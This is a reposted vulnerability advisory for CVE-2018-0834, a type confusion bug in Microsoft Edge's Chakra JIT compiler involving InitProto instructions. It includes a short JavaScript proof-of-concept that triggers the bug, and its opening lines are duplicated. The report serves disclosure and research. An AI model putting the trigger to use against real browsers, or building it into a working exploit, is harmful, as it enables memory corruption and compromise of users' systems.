Microsoft Edge: Chakra: JIT: Array type confusion via InitProto instructions
CVE-2018-0834
If a typed array is used as a prototype, it is converted to a Var array by the J Microsoft Edge: Chakra: JIT: Array type confusion via InitProto instructions
CVE-2018-0834
If a typed array is used as a prototype, it is converted to a Var array by the Js::JavascriptNativeFloatArray::SetIsPrototype method.
In the JIT compiler, it uses InitProto instructions to set object literals' prototype. But when optimizing those instructions, it doesn't reset the previous array validity even it can change the type of arrays. As a result, it can lead to type confusion.
Note: Expressions like "obj.__proto__" don't use InitProto instructions.
function opt(arr, proto) {
arr[0] = 1.1;
let tmp = {__proto__: proto};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 10000; i++) {
opt(arr, {});
}
opt(arr, arr);
print(arr);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
Microsoft Edge Chakra JIT InitProto Array Type Confusion
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 396